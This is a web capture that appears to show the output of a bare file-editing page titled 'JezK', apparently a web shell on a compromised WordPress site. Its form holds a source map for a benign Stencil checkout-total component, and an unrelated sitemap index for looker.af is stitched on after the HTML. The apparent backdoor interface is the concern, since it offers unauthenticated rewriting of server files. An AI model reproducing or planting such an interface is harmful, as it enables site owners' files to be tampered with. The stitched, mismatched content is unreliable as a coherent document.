
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: sc-total.entry.js.map</h2><form method="post"><textarea name="file_content" rows="10" cols="50">{&quot;file&quot;:&quot;sc-total.entry.js&quot;,&quot;mappings&quot;:&quot;;;;;;;;;;;;;AAAA,MAAM,UAAU,GAAG,yDAAyD,CAAC;AAC7E,sBAAe,UAAU;;ACGzB,MAAM,UAAU,GAAG;IACjB,KAAK,EAAE,sBAAsB;IAC7B,QAAQ,EAAE,yBAAyB;IACnC,UAAU,EAAE,2BAA2B;CACxC,CAAC;MAOW,OAAO;;;QAIlB,cAAS,GAAG;YACV,KAAK,EAAE,sBAAsB;YAC7B,QAAQ,EAAE,yBAAyB;YACnC,UAAU,EAAE,2BAA2B;SACxC,CAAC;qBAPmD,YAAY;;;IASjE,MAAM;;QACJ,MAAM,YAAY,GAAG,IAAI,CAAC,QAAQ,KAAIA,KAAa,aAAbA,KAAa,uBAAbA,KAAa,CAAE,QAAQ,CAAA,CAAC;QAC9D,IAAI,EAAC,YAAY,aAAZ,YAAY,uBAAZ,YAAY,CAAE,QAAQ,CAAA;YAAE,OAAO;QACpC,IAAI,EAAC,MAAA,MAAA,YAAY,aAAZ,YAAY,uBAAZ,YAAY,CAAE,UAAU,0CAAE,IAAI,0CAAE,MAAM,CAAA;YAAE,OAAO;QACpD,OAAO,CAAA,YAAY,aAAZ,YAAY,uBAAZ,YAAY,CAAG,UAAU,CAAC,IAAI,CAAC,KAAK,CAAC,CAAC,KAAI,EAAE,CAAC;KACrD;;;;;;&quot;,&quot;names&quot;:[&quot;checkoutState&quot;],&quot;sources&quot;:[&quot;src/components/controllers/checkout-form/total/sc-total.css?tag=sc-total&quot;,&quot;src/components/controllers/checkout-form/total/sc-total.tsx&quot;],&quot;sourcesContent&quot;:[&quot;:host {\n  display: block;\n}\n\n.total-amount{\n  display: inline-block;\n}\n&quot;,&quot;import { Component, Prop } from &#039;@stencil/core&#039;;\nimport { state as checkoutState } from &#039;@store/checkout&#039;;\nimport { Checkout } from &#039;../../../../types&#039;;\n\nconst ORDER_KEYS = {\n  total: &#039;total_display_amount&#039;,\n  subtotal: &#039;subtotal_display_amount&#039;,\n  amount_due: &#039;amount_due_display_amount&#039;,\n};\n\n@Component({\n  tag: &#039;sc-total&#039;,\n  styleUrl: &#039;sc-total.css&#039;,\n  shadow: false,\n})\nexport class ScTotal {\n  @Prop() total: &#039;total&#039; | &#039;subtotal&#039; | &#039;amount_due&#039; = &#039;amount_due&#039;;\n  @Prop() checkout?: Checkout;\n\n  order_key = {\n    total: &#039;total_display_amount&#039;,\n    subtotal: &#039;subtotal_display_amount&#039;,\n    amount_due: &#039;amount_due_display_amount&#039;,\n  };\n\n  render() {\n    const checkoutData = this.checkout || checkoutState?.checkout;\n    if (!checkoutData?.currency) return;\n    if (!checkoutData?.line_items?.data?.length) return;\n    return checkoutData?.[ORDER_KEYS[this.total]] || &#039;&#039;;\n  }\n}\n&quot;],&quot;version&quot;:3}</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
